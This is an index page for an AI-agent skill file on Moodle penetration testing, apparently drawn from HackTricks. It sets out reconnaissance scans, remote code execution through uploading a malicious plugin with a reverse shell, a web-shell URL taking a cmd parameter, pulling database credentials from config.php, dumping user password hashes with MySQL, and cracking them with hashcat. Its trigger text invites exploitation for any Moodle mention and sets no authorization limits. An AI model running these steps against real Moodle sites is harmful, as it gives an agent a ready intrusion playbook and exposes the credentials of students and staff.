OpenSkillIndex← back to search

Hacktricks-skills moodle-pentest

Security assessment and penetration testing for Moodle learning management systems. Use this skill whenever the user mentions Moodle, LMS security, educational platform pentesting, or needs to assess Moodle installations for vulnerabilities. Trigger for any Moodle-related security work including reconnaissance, vulnerability scanning, exploitation, or post-exploitation activities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/moodle/SKILL.MD
source content

Moodle Security Assessment

A comprehensive skill for conducting security assessments on Moodle learning management systems.

When to Use This Skill

Use this skill when:

  • Assessing Moodle installations for security vulnerabilities
  • Performing reconnaissance on educational platforms
  • Testing Moodle plugin security
  • Extracting credentials from compromised Moodle systems
  • Any security work involving Moodle LMS

Quick Start

# Run automated reconnaissance
python scripts/moodle_scan.py -u http://target.com/moodle/

# Check for known CVEs
python scripts/check_cves.py --version 3.9.0

Phase 1: Reconnaissance

Automated Scanning Tools

Run these tools to enumerate the Moodle installation:

Droopescan

pip3 install droopescan
droopescan scan moodle -u http://target.com/moodle/

What it finds:

  • Installed plugins and their paths
  • Moodle version detection
  • Interesting URLs (admin panels, readme files)
  • Exposed version files

Moodlescan

# Clone from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://target.com/moodle/

What it finds:

  • Server information (Apache, PHP versions)
  • Security headers
  • Moodle version via feature files
  • Known vulnerabilities

CMSMap

pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://target.com/moodle/

What it finds:

  • General CMS enumeration
  • Plugin detection
  • Version information

Manual Version Detection

Check these endpoints for version information:

  • /admin/tool/lp/tests/behat/course_competencies.feature
  • /README.txt
  • /mod/*/version.php
  • /theme/*/version.php

CVE Research

Once you have the version, check for known vulnerabilities:

Phase 2: Exploitation

RCE via Plugin Installation

Prerequisites: Manager role with plugin installation enabled

  1. Navigate to Site administration → Plugins → Install plugins

  2. If plugin installation is disabled, check for privilege escalation:

  3. Upload a malicious plugin:

    # Use the bundled RCE plugin
# Modify the IP and port before uploading
unzip moodle-rce-plugin.zip
# Edit the reverse shell IP/port in the plugin files
zip -r moodle-rce-plugin.zip moodle-rce-plugin/

  4. Access the malicious plugin:

    http://target.com/moodle/blocks/rce/lang/en/block_rce.php?cmd=id

Alternative RCE Plugin

Use the plugin from https://github.com/HoangKien1020/Moodle_RCE for a standard PHP shell with 

cmd
parameter.

Phase 3: Post-Exploitation

Find Configuration Files

find / -name "config.php" 2>/dev/null | grep "moodle/config.php"

The 

config.php
contains:

  • Database credentials
  • Database name
  • Table prefix (usually 
    mdl_
    )
  • Salt values
  • File storage paths

Extract Database Credentials

# From config.php, extract:
$CFG->dbuser = 'username';
$CFG->dbpass = 'password';
$CFG->dbname = 'moodle';
$CFG->dbtype = 'mysqli';

Dump User Credentials

/usr/local/bin/mysql -u <username> -p<password> -e "
  use moodle;
  select email, username, password from mdl_user;
  exit
"

Important: Moodle passwords are hashed. Use hashcat or john to crack them:

hashcat -m 1600 hashes.txt wordlist.txt

Additional Post-Exploitation

  • Check for other users with elevated privileges
  • Look for uploaded files in 
    /moodledata/
  • Review scheduled tasks and cron jobs
  • Check for backup files

Common Vulnerabilities

Privilege Escalation

  • CVE-2020-14321: Manager privilege escalation
  • Check for misconfigured roles and capabilities

Plugin Vulnerabilities

  • Outdated plugins with known CVEs
  • Custom plugins with insecure code
  • File upload vulnerabilities in plugins

Information Disclosure

  • Exposed 
    config.php
  • Version files in plugin directories
  • Debug mode enabled
  • Error messages revealing paths

Best Practices

  1. Always enumerate first - Don't skip reconnaissance
  2. Check multiple version sources - Different endpoints may show different versions
  3. Verify CVE applicability - Not all CVEs affect all versions
  4. Document findings - Track which plugins and versions are vulnerable
  5. Test plugin installation - This is often the most reliable RCE vector

Troubleshooting

Plugin Installation Fails

  • Check if you have manager role
  • Verify plugin installation is enabled in Site administration
  • Try privilege escalation via CVE-2020-14321

Version Detection Fails

  • Try multiple endpoints
  • Check for custom themes hiding version info
  • Look at HTTP headers for clues

Database Access Denied

  • Verify credentials from config.php
  • Check if database is on a different host
  • Look for connection strings in other config files